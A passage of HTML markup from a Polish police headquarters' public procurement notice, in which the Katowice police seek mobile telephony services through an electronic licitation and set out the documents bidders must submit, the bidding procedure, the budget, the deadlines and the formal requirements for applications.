KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Dokumenty, które należy załączyć do wniosku o dopuszczenie do licytacji elektronicznej (załącznik nr1 do ogłoszenia): 1. Oświadczenia wymagane na podstawie art. 25a ust. 1 ustawy Pzp, złożone naformularzu stanowiącym załącznik nr 4 i 5 do ogłoszenia oraz aktualne na dzień składania wniosku.UWAGA: a) Wykonawca, który zamierza powierzyć wykonanie częścizamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia zudziału w postępowaniu zobowiązany jest do zamieszczenia informacji o podwykonawcach we wskazanym wyżej oświadczeniu. b) W przypadku wspólnego ubiegania się o zamówienie wskazanewyżej oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. 2. Zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych wydawane przezPrezesa UKE, o którym, mowa w art. 10 i art. 11 ustawy z dnia 16 lipca 2004 r. Prawotelekomunikacyjne (Dz. U. Nr 171, poz. 1800 z późn. zm.) 3. odpis z właściwego rejestru lub zcentralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisudo rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5pkt 1 ustawy 4. Dokumenty, które winien złożyć zwycięzca licytacji elektronicznej: 1.Formularz ofertowy - załącznik nr 6 do ogłoszenia. 5Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentów, o których mowa w niniejszej sekcji składa dokument lub dokumentywystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzająceodpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, nie otwarto jego likwidacjiani nie ogłoszono upadłości. 6 W przypadku wskazaniaprzez wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w niniejszym rozdzialew szczególności punktów 3, w formie elektronicznej pod określonymi adresami internetowymiogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danychwskazane przez wykonawcę oświadczenia lub dokumenty. 7 W przypadku wskazania przezwykonawcę oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale w szczególności wpunkcie 3 , które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lubdokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, zamawiający wcelu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy, korzysta zposiadanych oświadczeń lub dokumentów, o ile są one aktualne. 8 W przypadku składania ofertyprzez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, każdy zpodmiotów występujących w konsorcjum musi przedłożyć w ofercie dokumenty określone w sekcji 3 ( oświadczenia, zaświadczenie o wpisie, odpis z właściwego rejestru lub zcentralnej ewidencji i informacji o działalności gospodarczej) .Dokumenty i oświadczenia w pozostałym zakresie mogą przedstawić łącznie. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">www.licytacje.uzp.gov.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">http://bip.katowice.kwp.policja.gov.pl/KWK/zamowienia-publiczne/katalog-zamowien-publi</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wymagania formalne: 1.1. Licytacja prowadzona będzie na platformie Urzędu ZamówieńPublicznych znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2. Z platformy w pełnym zakresiemogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresemhttps://licytacje.uzp.gov.pl 1.3. Wykonawca powinien dokonać rejestracji przed złożeniem wniosku odopuszczenie do udziału w licytacji. Przy rejestracji na platformie Wykonawca otrzyma loginidentyfikator użytkownika. 1.4.Od Wykonawców chcących wziąć udział w przedmiotowej licytacji niejest wymagany podpis elektroniczny. 1.5. Wykonawca, aby umożliwić Zamawiającemu dopuszczeniego do udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacjiprzekazać informację o swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnejpisowni tzn. z zachowaniem pisowni dużych i małych liter, numerów, spacji itp. Uwaga: Nie należyprzesyłać swojego hasła Zamawiającemu, nie należy też udostępniać hasła osobom nieuprawnionym.1.6. W przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie przekazania goZamawiającemu wraz z wnioskiem będzie skutkowało brakiem możliwości wzięcia udziałuWykonawcy w licytacji. 2. Wymagania techniczne urządzeń informatycznych, umożliwiającychsprawne korzystanie z niniejszego systemu: 2.1. Komputer klasy PC z systemem operacyjnymWindows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Firefox 2.0 lubwyższa. 2.2. Zamawiający informuje wg danych Urzędu Zamówień Publicznych, platforma zostałaprzetestowana w zakresie współpracy z przeglądarkami Mozilla Firefox 2.0 i 3.0 oraz InternetExplorer w wersji 6.0 oraz 7.0; w związku z powyższym Urząd Zamówień Publicznych zalecaużytkownikom korzystanie z ww. przeglądarek internetowych. 2.3. Zarówno Zamawiający jak i Urząd Zamówień Publicznych nie ponosi odpowiedzialności za nieprawidłowości wynikające z korzystaniaprzez Wykonawców z oprogramowania innego niż zalecane.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">1. Licytacja elektroniczna na przedmiot zamówienia będzie licytacją jednoetapową. 2. Po zalogowaniusię na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do aplikacjiumożliwiającej składanie ofert - postąpień. 3. W toku licytacji elektronicznej Wykonawcy składająswoje oferty cenowe w postaci elektronicznej. 4. W toku licytacji elektronicznej Wykonawcydopuszczeni do udziału w licytacji składają kolejne korzystniejsze postąpienia. Możliwość złożeniapostąpienia istnieje od otwarcia licytacji do jej zamknięcia w wyznaczonym terminie. 5. Ofertazłożona w toku licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą. 6. W tokulicytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz w groszach;grosze należy oddzielić od złotych kropką. 7. Cenę oferty brutto stanowi łączny koszt wykonaniazamówienia oraz wszystkie inne koszty z tym związane. Przed przystąpieniem do złożeniapostąpienia Wykonawca winien obliczyć cenę oferty tak, aby cena oferty dawałamaksymalnie wylicytowaną wartość brutto. 8. Oferta złożona przez Wykonawcę winna być niższa odoferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 9. Wartość przeznaczona na realizację zamówienia wynosi 383.999,99 zł. 10. Zamawiający przyjął za minimalne postąpienie wartość 1000,00PLN (kwota, o którą można pomniejszyć kolejną składaną ofertę, liczona od oferty najkorzystniejszej).System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnegopostąpienia. 11. Sposób podawania ceny oferty kwota określana jest w złotych oraz w groszach (jeżeliwystępują grosze, wpisujemy je po kropce, np.: 180000.00 obowiązuje dokładność do dwóch miejscpo kropce) Uwaga: Wykonawca nie może cofnąć raz złożonej oferty (prosimy o uważne wpisywanieoferowanych kwot i sprawdzanie ich przed naciśnięciem przycisku złóż postąpienie). 12. W celuzapewnienia aktualności listy postąpień niezbędne będzie samodzielne odświeżanie ekranu przyużyciu przycisku przeglądarki internetowej system nie dokonuje odświeżania automatycznie. 13. Wtoku licytacji system platformy licytacyjnej UZP na bieżąco udostępnia wszystkim Wykonawcominformacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacjielektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 10</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2018-02-05</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 09:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">5 dni od dnia przekazania Wykonawcom zaproszenia do składania ofert, godzina 10:00</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Licytacja zostanie zamknięta jeżeli w ciągu 10 minut od złożenia najkorzystniejszego postąpienia,żaden z Wykonawców nie złoży korzystniejszego postąpienia</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Zgodnie z treścią projektu umowy stanowiący załącznik nr 2 i 2a do ogłoszenia</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">nie wymaga </span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zgodnie z treścią wzoru umowy stanowiący załącznik nr 2 i 2a do ogłoszenia oraz ustawa PZP</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-02-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">PL</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. CENA: 1. Wykonawca, który wygra licytację, przed zawarciem umowy wypełni i dostarczyZamawiającemu Formularz ofertowy - załącznik nr 6 do ogłoszenia dostępny na stroniewww.bip.katowice.kwp.policja.gov.pl. II. PRZEKAZANIE WNIOSKU O DOPUSZCZENIE DOUDZIAŁU W LICYTACJI: 1. Wniosek ma być złożony w zamkniętej, zabezpieczonej kopercie(kopertach) nie jest dopuszczalne złożenie wniosku w formie elektronicznej za sposób zabezpieczeniakopert/y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na Zamawiającego i oznaczona:Wniosek o dopuszczenie do udziału w licytacji elektronicznej na: ZP-2380-7/2018 Świadczenie usług telekomunikacyjnych w sieci telefonii komórkowej. Adres Zamawiającego: Komenda Wojewódzka Policji wKatowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 Nie otwierać przedkomisyjnym otwarciem wniosków. 3. Ponadto koperta winna spełniać warunek uniemożliwiającyodczytanie jej zawartości i oznaczona nazwą (firmą) i adresem Wykonawcy z uwagi na pkt. 4. 4. Wnioskizłożone po terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostanązwrócone Wykonawcom po upływie ostatecznego terminu składania wniosków. III OPIS SPOSOBUPRZYGOTOWANIA WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek o dopuszczenie doudziału w postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki wskazanew Sekcji III.7. ogłoszenia 2. Wniosek o dopuszczenie do udziału w postępowaniu oraz wszystkiezałączniki w tym dokumenty i oświadczenia, mają być w całości sporządzone w języku polskim, ręcznie,na maszynie do pisania lub komputerze (w sposób czytelny) oraz podpisany w sposób określony pkt. 3przez osoby uprawnione Nie dotyczy załączników składanych, jako oryginały wystawione i podpisaneprzez uprawnione organy np. KRS. 3. Wszystkie dokumenty w złożonej ofercie muszą byćopieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione iopieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnieprzez osoby uprawnione. Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie zwłaściwego rejestru lub działająca z jej upoważnienia Dokumenty wielostronicowe mogą być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione iopieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnieprzez osoby uprawnione na pierwszej lub ostatniej jego stronie. Dokumenty mogą być składane w formieoryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem przez Wykonawcę.W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego oraz wprzypadku innych podmiotów, na zasobach których Wykonawca polega kopie dokumentów dotyczącychodpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednioprzez Wykonawcę lub te podmioty. W przypadku składania dokumentów wydanych w języku innym niżjęzyk polski, dokumenty te są składane wraz z tłumaczeniem na język polski, poświadczonym przezWykonawcę. Uwaga: Przez podpis czytelny Zamawiający rozumie podpis odręczny, zawierający imię inazwisko pozwalający na identyfikację osoby, która go złożyła. 4. W przypadku spółek prawahandlowego zmiany w składzie zarządu są skuteczne z chwilą podjęcia uchwały przez odpowiedni organ.Skuteczność takiej uchwały nie jest uzależniona od dokonania odpowiedniego wpisu w KRS.Wystarczającym będzie, że Wykonawca dołączy do oferty dotychczas obowiązujący KRS i uchwałę ozmianie zarządu. 5. W przypadku podpisywania wniosku przez osobę nie wymienioną w aktualnymodpisie z właściwego rejestru, niezbędne jest we wniosku pełnomocnictwo dla osoby działającej wimieniu Wykonawcy w formie oryginału lub jego poświadczonej notarialnie kopii. Pełnomocnictwo wsposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba podpisująca wniosek odopuszczenie do udziału w postępowaniu. 6. W przypadku Wykonawców ubiegających się wspólnie (np.konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2 ustawy PZP wynikaobowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym postępowaniu lub doreprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jestprzedłożenie we wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej notarialnie kopii wcelu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców w sposóbumożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Uwaga:W przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającegopełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólnikówma wynikać z samej umowy spółki cywilnej dołączonej do wniosku. 7. Wszelkie miejsca, w którychWykonawca naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobęuprawnioną). 8. Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za nieważne. 9.Wnioski o dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach ocenyspełniania warunków udziału w postępowaniu (art. 96 ust 3 ustawy PZP). Nie ujawnia się informacjiumożliwiających identyfikację Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia orazinformacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, 